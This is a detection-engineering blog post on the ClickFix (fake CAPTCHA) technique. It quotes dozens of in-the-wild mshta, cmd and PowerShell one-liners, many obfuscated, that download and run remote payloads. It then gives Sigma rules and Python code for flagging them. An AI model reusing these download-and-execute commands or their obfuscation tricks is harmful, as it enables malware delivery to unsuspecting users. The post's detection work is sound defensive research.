_Published: 6/11/2025_

## Intro

[ClickFix](https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape) (FakeCaptcha) has rapidly become the latest and greatest social engineering tactic, tricking end users into detonating malicious commands and pulling down payloads. The name for the technique was coined by [proofpoint](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn) back in June of last year. While it didn't start out this simple, the current form is: a compromised site carries an injected snippet which delivers a fake captcha prompt to prove the end user is not a bot. This instructs the end user to press `Windows Key + R`, which opens the Run dialog box. JavaScript on the page has already written the malicious command (powershell | cmd | mshta) into the user's clipboard. Pressing `Control + V` and Enter as instructed instantly detonates the command via that Run dialog box. Since then, threat actors have hopped on the ClickFix train given the simplicity and high rate of success, resulting in a wide variety of distributions such as ClearFake, KongTuke, Lumma Stealer, Emmenhtal, etc. Security vendors have largely been playing a game of cat and mouse, trying to catch the various ways that threat actors evade detections through trivial command line obfuscation.

## Command Line Observations

> Commands are compiled below for easy reference.
> Here are some of the example commands spotted in the wild:

#### mshta

```text
"C:\Windows\system32\mshta.exe" https://captcha-domain.things/1.mp3 # ✔ I am not a robot - reCAPTCHA Verification ID: 2165
"C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=009f49d2-1a0c-4b84-bf2e-9ffe1148073c # ''I am not a 'robot' - гeСАРТСНА Verification ID: 8398''
"C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=49ae2e5e-9056-4af9-8477-35ac6fbc25e6 # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 421966''
"C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=77d76b77-8f3b-473e-a9e4-b0532d58c903 # ''I am not a robot - САРТСНА Verification ID:701211''
"C:\WINDOWS\system32\mshta.exe" http://ok.domain.us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"
```

#### cmd

```text
"C:\WINDOWS\system32\cmd.exe" /c start /min powershell -Command "curl.exe -s 'http://domain.live/cd/' -o (Join-Path $env:TEMP 'd.js'); Start-Process (Join-Path $env:TEMP 'd.js')" # ✔ ''Cloud Identificator: 3261''
"C:\WINDOWS\system32\cmd.exe" /c "curl -s https://domain.pw/softly.bat -o C:\Users\username\AppData\Local\Temp\1\\p.bat && start /b C:\Users\username\AppData\Local\Temp\1\\p.bat &&" echo 🛡️ Human Detected — Firewall Guardian Code: 6274848
"C:\WINDOWS\system32\cmd.exe" cmd /c curl.exe -k -Ss -X POST "https://domain.top/www/sss.php" -o "C:\Users\Public\dysm.bat" && start /min "" "C:\Users\Public\dysm.bat" Please Enter or OK button
```

#### powershell

```powershell
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 irm https://www.domain.info|iex
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" "irm https://domain.ly/fidowindows | iex"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.live/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))"
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$s='xif/pot.maldomain//:sptth';$r=$s[-1..-$s.Length]-join'';iex(iwr $r -UseBasicParsing)""
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" /nOPR"o" ―W h -c "$url = 'd"om"a"in".com';$s"cr"i"pt" = I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "iex $(irm 162.55.47.21:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h $s=@(104,116,116,112,58,47,47,122,57,56,49,50,51,46,116,111,112,47,49,50);$a=New-Object System.Xml.XmlDocument;$a.Load([System.Text.Encoding]::ASCII.GetString($s));$a.command.t.rtd|iex
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" $n='mNWU#ieS:old/CnTxHPE';$qH='.t';$g=$N+$qH;$DD='XsIKzrO';$H=$dd+$G;$o=$H[24]+$g[21]+$G[15]+'P'+$h[1]+$g[8]+$G[12]+'/cI'+$g[15]+$H[2]+'zEnDO'+$H[7]+'.SKi'+$n[1]+'/f516180c';$K='iR'+$H[7]; $gL=$G[5]+$g[19]+$DD[0]; &$gL(&$K $o);.'
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoP -c "$a='api';$b='oofse';$c='icu';$u=[string]::join('',[char[]](104,116,116,112,115,58,47,47)+$a+$b+'.'+$c+'/fix');$s='i'+'e'+'x';$r='i'+'w'+'r';$p='-Us'+'eBa'+'sicP'+'arsing';$z=$s+'('+$r+' '+$u+' '+$p+')'"|iex #Confirmation number - 1543
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoP -c "$a='api';$b='klrdgd';$c='icu';$u=[string]::join('',[char[]](104,116,116,112,115,58,47,47)+$a+$b+'.'+$c+'/fix');$s='i'+'e'+'x';$r='i'+'w'+'r';$p='-Us'+'eBa'+'sicP'+'arsing';$z=$s+'('+$r+' '+$u+' '+$p+')'"|iex #Confirmation number - 154
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$g=''; @(19,28,23,-54,18,30,30,26,29,-28,-39,-39,11,19,25,29,28,19,16,-40,13,25,23,38,19,15,34)|%{$g+=[char]($_+86)};.(gcm ?ex)($g)"
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$of=''; @(17,26,21,-56,16,28,28,24,27,-30,-41,-41,9,17,23,27,26,17,14,-42,11,23,21,36,17,13,32)|%{$of+=[char]($_+88)};.(gcm i?x)($of)"
"C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 9167
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 8290
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$i = New-Object -ComObject ('WindowsInstaljer.Installer'.Replace('j','l')); $i.UILevel = 2; $i.('InstaljProduct'.Replace('j','l'))(('htdos://domain.live/'.Replace('do','tp')),'')"; Service connection checkup : 6071
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$i = New-Object -ComObject ('WindowsInstaljer.Installer'.Replace('j','l')); $i.UILevel = 2; $i.('InstaljProduct'.Replace('j','l'))(('htdos://domain.live/'.Replace('do','tp')),'')"; Service connection checkup : 7712
"C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 1910
"C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 3445
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -W HiDdEn -ExecutionPolicy Bypass -C "$u=('h'+'ttp://77.110.'+'118.130/eee.txt');IEX((IWr -UseBasicParsing -Uri $u).Content)"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly91aWtrLmFuaW1hbGlhb3Fpc3NvLmNvbS9pZnplZnNocnd3Z3BoZA=='));IEX $w.DownloadString($u)"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.org/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.org/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm subdomain.trycloudflare.com/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm subdomain.trycloudflare.com/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))"
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -Command "iex (new-object Net.WebClient).'DownloadString'('http://181.174.100.100/transform')"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$l='https://domain.online/gillikombugona.m4a';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ ''I am not a robot: CAPTCHA Verification UID: 7811''
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 & \W*\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\\\\\\\m*ht*e https://domain.shop/payload.m4a # ✅ ''I am not a robot: Cloudflare Verification ID: 439121''
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "& ([scriptblock]::Create((irm settings-domain.live/siglost)))"
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -N"OPr"O —w h –C "$v"jl"ea = 'r"ed"ac"t"ed"000"00"70n[.]inf"o'; $p"h"blnm = Invo"k"e-R"e"st"Me"tho"d" -U"r"i $vj"le"a; I"nv"o"ke"-E"x"pression $phblnm"
```

### encoded powershell

```powershell
powershell -WinD H -enc bQBZAGgAdABhACAAIgFOAHQAbQAwAVAC8AcgBLbAHAAbWByAHQAMwUAAGIALGOSjAGQAbgAUg4AZQBOAC8AbYAGEAMQAoACIA=
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ec JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABpAHIAbQAgACcAaAB0AHQAcABzADoALwAvAHAAbAB1AHMALQBwAGEAdgBlAGwALgBjAG8AbQAvAGYALwB0AC8ASwBtADYAOABDAEUASgBYAC4AagBwAGcAJwApACkAKQA=
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" /ep bypass /e JABiAD0AKABOAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzACcAKwAnAGUAZQAuAGkAbwAvADcAbQAnACsAJwAyAHkAaAB4ACcAKQA7AGkAZQBYACAAJABiADsA /W 1
```

## Drawing Parallels

You may have picked up on a few themes already, but the main overlaps are the use of common keywords, emoticons, Cyrillic character embeddings, less than credible top-level domains, and behaviors such as Invoke-Expression, Invoke-RestMethod, curl, etc. Both `cmd.exe` and `mshta.exe` have significantly fewer shorthand interpretations than PowerShell, which has seemingly endless methods of obfuscation. For instance, encoding can be invoked by `-e`, `-en`, `-enc`, or `-eC`. It can set single-character variables, splice arbitrary quote characters into names such as `"RestM"et"hod`, `Invoke-WebRequest` can become the shorthand `iR`, etc. That said, `mshta.exe` and `cmd.exe` are easy to nail down from a few angles, while PowerShell obfuscation becomes a rabbit hole of a topic. As the obfuscation and behavior have evolved over the past several months, so have our methods of flagging this behavior.

**Keyword overlap**:

- captcha
- human
- robot
- authentication
- verification
- secure code
- service connection
- confirmation number

Why not just flag on keywords? Unfortunately, this is easily bypassed: characters are often swapped with Cyrillic look-alikes.

**TLD overlap**:

- .shop
- .live
- .pw
- .info
- .icu
- .top

> Note: These are not the only abused TLDs. More costly TLDs such as `.net` and `.com` are abused as well, alongside highly suspect TLDs such as `.top`.

**Behaviors**:

- Curl
- Invoke-RestMethod | irm | iR
- Invoke-Expression | iex
- Invoke-WebRequest | iwr
- Single character variables
- Net.WebClient
- `.Replace` for obfuscation
- Excess of characters for obfuscation (`'`, `"`, `*`, `\`)
- Cyrillic character injection

## Mapping via Canvas

> Here's a basic canvas mapping out infections from the fakecaptcha delivery to the run dialog box to the subsequent commands. The green rectangle maps out coverage with some of the rules provided below.

![[fakecaptcha_canvas.png]]

Sometimes the KISS method is most appropriate with detections like these. There is no shortage of crazy pivots that could be made, but sometimes the simplest ideas are the most fitting. I should also point out that there are plenty of follow-on ideas that could hit the later stages of the infections, but the detections outlined below are centered around the ClickFix technique / initial execution. Later stages such as SOCKS proxy behavior from NodeJS, deployment of NetSupport, chained interpreters, etc. are not covered in this post.

## Detection Opportunities

### Detection 1: Kitchen Sink - Suspicious DNS Request

> Here we have abused lolbins, and we simply check that they are not beaconing out to suspicious TLDs.
```yaml
title: Kitchen Sink - Suspicious DNS Request
id: 9abfcdeb-f678-7904-e2f5-426614174015
description: "Detects DNS requests from high-risk processes (e.g., cmd.exe, powershell.exe) to suspicious tlds (e.g., .top, .icu, .xyz) or domains (e.g., trycloudflare), indicating potential c2 communication"
status: experimental
author: b
date: 2025/05/20
logsource:
    category: dns
    product: windows
detection:
    selection_process:
        Image|endswith:
            - '\cmd.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\powershell_ise.exe'
            - '\msiexec.exe'
    selection_dns_tld:
        # Anchored to the end of the queried name. In single-quoted YAML a
        # backslash is literal, so '\.top$' reaches the regex engine as \.top$
        dns.request|re:
            - '\.ar$'
            - '\.b2$'
            - '\.boats$'
            - '\.buzz$'
            - '\.cc$'
            - '\.cf$'
            - '\.cfd$'
            - '\.click$'
            - '\.club$'
            - '\.digital$'
            - '\.ga$'
            - '\.gq$'
            - '\.hair$'
            - '\.icu$'
            - '\.info$'
            - '\.life$'
            - '\.live$'
            - '\.lol$'
            - '\.makeup$'
            - '\.ml$'
            - '\.monster$'
            - '\.motorcycles$'
            - '\.online$'
            - '\.pics$'
            - '\.pw$'
            - '\.ru$'
            - '\.run$'
            - '\.sbs$'
            - '\.shop$'
            - '\.site$'
            - '\.skin$'
            - '\.tn$'
            - '\.tk$'
            - '\.today$'
            - '\.tmp$'
            - '\.top$'
            - '\.vip$'
            - '\.win$'
            - '\.xyz$'
    selection_dns_domain:
        dns.request|contains:
            - 'bashupload'
            - 'paste'
            - 'station307'
            - 'steam'
            - 'trycloudflare'
    condition: selection_process and (selection_dns_tld or selection_dns_domain)
fields:
    - Image
    - dns.request
falsepositives:
    - legitimate scripts accessing benign domains with suspicious tlds
    - third-party tools using similar processes
level: high
tags:
    - attack.command_and_control
    - attack.t1071
```

### Detection 2: Script Execution via Explorer

> The rule was designed to catch the exact behavior outlined in the canvas, from the parent process `explorer.exe` to child processes such as `cmd.exe`, `powershell.exe`, or `mshta.exe`.

> Update: Among the various patterns and obfuscation methods, I discovered that PowerShell interprets different forms of hyphens. Therefore any pattern with embedded hyphens was bypassed.
> In the last command (non-encoded PowerShell) provided above, they used both an em dash (—) and an en dash (–) to break patterns such as `-C "` or `-w h`. To account for this, I added command-line filters searching for these unexpected dashes.

```yaml
title: FakeCaptcha - Clipboard Injection
id: 987fcdeb-12a3-4b56-89ef-426614174001
description: Detects suspicious command-line patterns in FakeCaptcha campaigns (e.g., ClearFake) where users are prompted to paste malicious shell commands via clipboard (Windows Key + R, Ctrl-V).
status: experimental
author: b
date: 2025/05/20
logsource:
    category: process_creation
    product: windows
detection:
    selection_base:
        ParentImage|endswith: '\explorer.exe'
    selection_mshta:
        Image|endswith: '\mshta.exe'
    filter_mshta_start:
        # Sigma has no "none" modifier; mshta.exe launched with start.hta is
        # excluded in the condition instead
        CommandLine|contains: 'start.hta'
    selection_cmdline_tools:
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
            - '\conhost.exe'
        CommandLine|contains:
            # Core PowerShell cmdlets for web and execution
            - 'Invoke-WebRequest'
            - 'Invoke-Expression'
            - 'Invoke-RestMethod'
            - 'Net.WebClient'
            - 'DownloadString'
            - 'iex'
            - 'irm '
            # File and clipboard operations
            - 'Set-Content'
            - 'Get-Content'
            - 'Set-Clipboard'
            - 'Get-Clipboard'
            - 'Expand-Archive'
            # Obfuscation and encoding techniques
            - '[scriptblock]::Create'
            - '[string]::join('
            - '[Array]::Reverse('
            - ';-join'
            - '[char[]]('
            - '.SubString('
            # Command-line flags for obfuscation
            - '-c "'
            - '-w h'      # Hidden window
            - '-wind h'   # Hidden window (variant)
            - ' -e '      # Encoded command
            - ' /e '
            - ' -en '
            - ' /en '
            - '-enc'
            - '/enc'
            - '-ec '
            # Additional tools for network or data transfer
            - 'curl'
            - 'Net.Sockets.TCPClient'
            # Unicode dashes PowerShell accepts in place of '-' (en dash, em dash)
            - '–'
            - '—'
    filter_exclusions:
        CommandLine|contains:
            - '\Local\Microsoft\OneDrive\'
            - '\HP\'
    condition: selection_base and ((selection_mshta and not filter_mshta_start) or selection_cmdline_tools) and not filter_exclusions
fields:
    - ParentImage
    - Image
    - CommandLine
falsepositives:
    - Legitimate PowerShell scripts using similar cmdlets in administrative tasks
    - Third-party software installers using curl or clipboard operations
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
```

### Detection 3: Anomalous MSHTA Usage

> The rule was designed to catch a variety of behavior with `mshta.exe`, including execution without expected extensions (.hta / .bat), interpreter chaining where it spawns shell sessions, or suspicious strings within the command line.

```yaml
title: Anomalous MSHTA Usage
id: 21532220-adb7-40ba-b0f3-5493212387a3
description: Triggers when mshta.exe exhibits suspicious behavior, such as executions without .html, .hta, or .bat extensions, from Downloads or archive folders, or spawning cmd.exe, powershell.exe, etc.
status: stable
author: b
date: 2025/02/18
modified: 2025/05/08
logsource:
    product: windows
    category: process_creation
detection:
    selection_mshta:
        ProcessName|endswith: '\mshta.exe'
        CommandLine|contains:
            - '\Downloads\'
            - '\Temp\7z'
            - '\Temp\Rar'
            - '\Temp\Temp?_'
            - '\Temp\BNZ.'
            - 'GetObject'
            - 'WScript.Shell'
            - '.run('
            - ').Exec('
            - 'mshtml'
            - 'StrReverse'
            - '.RegWrite'
            - 'window.close('
            - ' Chr('
            - 'http'
    filter_mshta:
        CommandLine|contains:
            - '.html'
            - '.hta'
            - '.bat'
    selection_spawn:
        ParentProcessName|endswith: '\mshta.exe'
        ProcessName|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
            - '\regsvr32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    filter_spawn:
        CommandLine|contains:
            - '\HP\'
            - 'printui.dll'
    condition: (selection_mshta and not filter_mshta) or (selection_spawn and not filter_spawn)
fields:
    - ProcessName
    - CommandLine
    - ParentProcessName
level: high
tags:
    - attack.execution
```

## Conclusion

There are plenty of different angles to alert on this behavior. From my observations, the **kitchen sink** and the **clipboard inject** rules have yielded the most results, catching upwards of a dozen true positives while minimizing false positives. For the obfuscation reasons described earlier, there is always a risk of evasion, so applying a group of rules that catch it from different angles is advised. If you're lucky enough to have events with **RunMRU** registry keys, you are positioned in an even better spot.
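The "Drawing Parallels" section and the Detection 2 update both come down to the same problem: the keyword and behavior lists are matched against raw command lines, and the samples above defeat them with Cyrillic look-alike letters, em/en dashes in place of `-`, and quotes spliced into cmdlet names. The following is an added example, not code from the post, showing how a matcher can fold those tricks away before applying the post's own lists. The homoglyph table, the dash set, the regexes and the sample command lines are all constructed for this example.

```python
"""Added example (not the post's own code): obfuscation-tolerant matching of
the keyword and behavior lists from "Drawing Parallels".

Before matching, the raw command line is folded: Cyrillic homoglyphs become
the Latin letters they imitate, en/em dashes and the horizontal bar become "-",
and quote splicing such as I"nv"oke-"RestM"et"hod" is undone (the PowerShell
tokenizer joins those fragments back into Invoke-RestMethod).
"""
import re
import unicodedata

# Constructed table: Cyrillic letters that render like Latin letters, mapped to
# the Latin letter they imitate. Covers the lure text quoted in the post.
HOMOGLYPHS = str.maketrans({
    "\u0410": "A", "\u0412": "B", "\u0421": "C", "\u0415": "E", "\u041d": "H",
    "\u041a": "K", "\u041c": "M", "\u041e": "O", "\u0420": "P", "\u0422": "T",
    "\u0425": "X", "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o",
    "\u0440": "p", "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0433": "r",
})

# Dash characters the PowerShell tokenizer accepts as "-": en dash, em dash,
# horizontal bar (all three appear in the sample commands in the post).
DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})

KEYWORDS = ["captcha", "human", "robot", "authentication", "verification",
            "secure code", "service connection", "confirmation number"]

# Behaviors from the post, lowercased because matching runs on the folded form.
BEHAVIORS = ["curl", "invoke-restmethod", "irm ", "invoke-expression", "iex",
             "invoke-webrequest", "iwr", "net.webclient", "downloadstring",
             ".replace(", "-w h", "-wind h"]

CYRILLIC = re.compile(r"[\u0400-\u04ff]")
UNICODE_DASH = re.compile(r"[\u2013\u2014\u2015]")
# A quote wedged between two token characters, e.g. I"nv"oke or -N"OPr"O.
SPLICED_QUOTE = re.compile(r"""(?<=[A-Za-z0-9])["'](?=[A-Za-z0-9-])""")
# -e / -en / -enc / -ec / -EncodedCommand and the "/" forms. -ep and
# -ExecutionPolicy do not match because whitespace must follow the flag.
ENCODED_FLAG = re.compile(r"(?<!\w)[-/]e(?:c|n|nc|ncoded(?:command)?)?(?=\s)")


def normalize(cmdline: str) -> str:
    """Fold the obfuscation tricks into one lowercase form used for matching."""
    folded = unicodedata.normalize("NFKC", cmdline)      # fullwidth forms etc.
    folded = folded.translate(HOMOGLYPHS).translate(DASHES)
    folded = folded.replace('"', "").replace("'", "")    # undo quote splicing
    folded = re.sub(r"\s+", " ", folded).strip()
    return folded.lower()


def analyze(cmdline: str) -> dict:
    """Keyword hits and behavior hits on the folded form, plus signals from the raw form."""
    folded = normalize(cmdline)
    return {
        "normalized": folded,
        "keywords": [k for k in KEYWORDS if k in folded],
        "behaviors": [b for b in BEHAVIORS if b in folded],
        "signals": {
            "cyrillic": bool(CYRILLIC.search(cmdline)),
            "unicode_dash": bool(UNICODE_DASH.search(cmdline)),
            "quote_splicing": bool(SPLICED_QUOTE.search(cmdline)),
            "encoded": bool(ENCODED_FLAG.search(folded)),
        },
    }


def is_suspicious(cmdline: str) -> bool:
    """A keyword, a behavior or any raw-form signal is enough to surface the event."""
    r = analyze(cmdline)
    return bool(r["keywords"] or r["behaviors"] or any(r["signals"].values()))


# Constructed samples modelled on the command lines quoted in the post.
SAMPLES = {
    # Lure text with Cyrillic homoglyphs ("Human, not a robot: CAPTCHA Verification").
    "homoglyph_lure": '"C:\\WINDOWS\\system32\\mshta.exe" https://check.domain.icu/gkcxv.google?i=49ae2e5e-9056-4af9-8477-35ac6fbc25e6 '
                      '# Hum\u0430n, n\u043et \u0430 r\u043eb\u043et: CAPTCH\u0410 V\u0435r\u0456f\u0456\u0441\u0430t\u0456\u043en ID: 421966',
    # Em dash before -w, en dash before -C, quote-spliced parameter and cmdlet names.
    "dash_and_splice": '"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -N"OPr"O \u2014w h \u2013C '
                       '"$v"jl"ea = \'example.invalid/x\'; $p"h"blnm = Invo"k"e-R"e"st"Me"tho"d" -U"r"i $vj"le"a; I"nv"o"ke"-E"x"pression $phblnm"',
    # -WinD hidden-window variant plus -enc; payload is a constructed UTF-16LE base64 of "echo".
    "encoded": "powershell -WinD H -enc ZQBjAGgAbwA=",
    "benign": '"C:\\WINDOWS\\system32\\cmd.exe" /c "echo hello > C:\\Users\\Public\\out.txt"',
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        r = analyze(cmd)
        fired = [k for k, v in r["signals"].items() if v]
        print(f"{name:16} suspicious={is_suspicious(cmd)} keywords={r['keywords']} "
              f"behaviors={r['behaviors']} signals={fired}")
```

The raw-form signals are kept separate from the folded-form matches on purpose: a Cyrillic letter or an em dash in a Run-box command line is itself worth surfacing, even when the folded text matches nothing else. At the rule level, Sigma's `windash` modifier covers the dash part of this by expanding `-` to the `/`, en dash, em dash and horizontal bar variants, so the explicit `'–'` and `'—'` entries in Detection 2 can be replaced by `CommandLine|contains|windash` on the flag patterns.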
Hope this helps and happy hunting!
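As an added illustration of Detection 1 (not code from the post), the same process-plus-TLD logic in plain Python, run over constructed DNS events. It makes two points explicit that the Sigma rule leaves implicit: the TLD test must be anchored to the last label of the name (a substring test on `.top` would also fire on `www.topology.com`), and the `contains` indicators such as `steam` are broad enough that the process constraint is what keeps them usable. All events and domains below are constructed.

```python
"""Added example (not the post's own code): the Detection 1 logic in Python.

A DNS event matches when the querying process is one of the abused lolbins
and the queried name either ends in a suspicious TLD or contains one of the
suspicious substrings, mirroring the Sigma rule's condition.
"""
from typing import Optional

HIGH_RISK_PROCESSES = {
    "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "msiexec.exe",
}

# TLD list from the rule. Compared against the last label only, which is what
# the anchored regex '\.top$' expresses.
SUSPICIOUS_TLDS = {
    "ar", "b2", "boats", "buzz", "cc", "cf", "cfd", "click", "club", "digital",
    "ga", "gq", "hair", "icu", "info", "life", "live", "lol", "makeup", "ml",
    "monster", "motorcycles", "online", "pics", "pw", "ru", "run", "sbs", "shop",
    "site", "skin", "tn", "tk", "today", "tmp", "top", "vip", "win", "xyz",
}

# Substring indicators from the rule. Deliberately broad ("steam" also sits
# inside legitimate names), so the process constraint above is required too.
SUSPICIOUS_SUBSTRINGS = ("bashupload", "paste", "station307", "steam", "trycloudflare")


def tld_of(name: str) -> str:
    """Last DNS label of a query name, ignoring a trailing dot and letter case."""
    labels = name.rstrip(".").lower().split(".")
    return labels[-1] if labels else ""


def evaluate(event: dict) -> Optional[str]:
    """Return why the event matches the rule, or None when it does not.

    `event` carries at least 'Image' (full process path) and 'dns.request'.
    """
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in HIGH_RISK_PROCESSES:
        return None  # selection_process did not match
    query = event.get("dns.request", "").lower()
    tld = tld_of(query)
    if tld in SUSPICIOUS_TLDS:
        return f"suspicious tld .{tld}"
    for needle in SUSPICIOUS_SUBSTRINGS:
        if needle in query:
            return f"suspicious domain substring {needle!r}"
    return None


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dns.request": "api.example.icu"},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "dns.request": "quiet-river.trycloudflare.com"},
    {"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "dns.request": "cdn.example.top"},                      # browser: not a high-risk process
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dns.request": "www.topology.com."},                    # ".top" only as a substring
]


def run_samples() -> list:
    """Evaluate every sample event; returns [(query, reason_or_None), ...]."""
    return [(e["dns.request"], evaluate(e)) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for query, reason in run_samples():
        print(f"{query:32} -> {reason or 'no match'}")
```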